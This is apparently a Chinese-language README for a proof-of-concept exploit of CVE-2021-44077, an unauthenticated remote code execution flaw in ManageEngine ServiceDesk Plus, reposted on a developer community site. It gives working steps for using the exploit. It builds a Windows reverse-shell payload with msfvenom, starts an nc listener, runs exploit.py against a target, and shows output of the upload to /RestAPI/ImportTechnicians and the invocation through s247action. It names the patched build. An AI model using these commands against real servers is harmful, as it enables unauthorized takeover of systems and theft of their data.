CVE-2021-44077 的概念利用证明:ManageEngine ServiceDesk Plus < 11306 中的 PreAuth RCE
基于:
CISA咨询:
修复(更新到 build 11306 或更高版本):
在 ManageEngine ServiceDesk Plus Build 11303 上测试。禁用所有 AV。
该漏洞利用将 Windows 可执行文件上传到目标并执行它。
要利用,首先生成任何可执行文件。例如:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
pip install
要求文件或确保你有requests
包。
如果您试图捕获反向 shell,请先运行您的侦听器,例如
nc -l 4444
然后运行漏洞利用脚本,传入url
和exe
参数,例如
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
示例脚本输出:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。